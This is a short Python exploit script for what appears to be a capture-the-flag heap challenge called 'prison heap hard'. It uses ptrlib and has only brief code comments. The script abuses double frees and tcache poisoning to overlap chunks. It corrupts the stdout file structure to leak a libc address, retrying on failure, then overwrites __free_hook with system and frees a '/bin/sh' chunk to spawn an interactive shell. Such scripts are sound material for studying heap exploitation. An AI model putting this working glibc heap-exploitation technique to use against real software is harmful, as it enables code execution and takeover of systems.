prison heap hard

exploit.py

from ptrlib import *

def new(size, data):
    sock.sendlineafter("Exit\n", "1")
    sock.recvline()
    sock.sendline(str(size))
    sock.recvline()
    sock.sendline(data)

def delete(index):
    sock.sendlineafter("Exit\n", "2")
    sock.recvline()
    sock.sendline(str(index))

libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

while True:
    sock = Process("./prison_heap_hard")

    # prepare chunks
    new(0x28, "0")  # chunk for double free
    new(0x18, "1")  # chunk for overlap
    new(0x428, "2") # chunk linked into unsorted bin
    new(0x18, "3")  # avoid consolidation
    delete(2)

    # overlap chunks
    delete(1)
    delete(1)
    new(0x18, "\xb0") # linked to chunk 2
    delete(0)
    delete(0)
    new(0x28, "\xb0") # linked to chunk 2

    # fake fd
    new(0x18, "6")
    new(0x28, "7")
    new(0x18, "\x60\xd7") # good luck :)
    new(0x28, "9")

    # leak libc address
    payload  = p64(0xfbad1800)
    payload += p64(0) * 3
    payload += b'\x88'
    try:
        new(0x28, payload)
        libc_base = u64(sock.recvline()[:8]) - libc.symbol('_IO_2_1_stdout_') - 0x83
        logger.info("libc = " + hex(libc_base))
        assert libc_base > 0 and libc_base < 0x800000000000
    except:
        logger.warn("Bad luck!")
        sock.close()
        continue

    # tcache poisoning
    sock.sendline("1") # recvuntil won't work here ;)
    sock.sendlineafter("heap\n", str(0x38))
    sock.sendlineafter("prison", "11")
    delete(11)
    delete(11)
    new(0x38, p64(libc_base + libc.symbol('__free_hook')))
    new(0x38, "/bin/sh\0")
    new(0x38, p64(libc_base + libc.symbol('system')))

    # get the shell
    delete(13)
    sock.recv()

    sock.interactive()
    break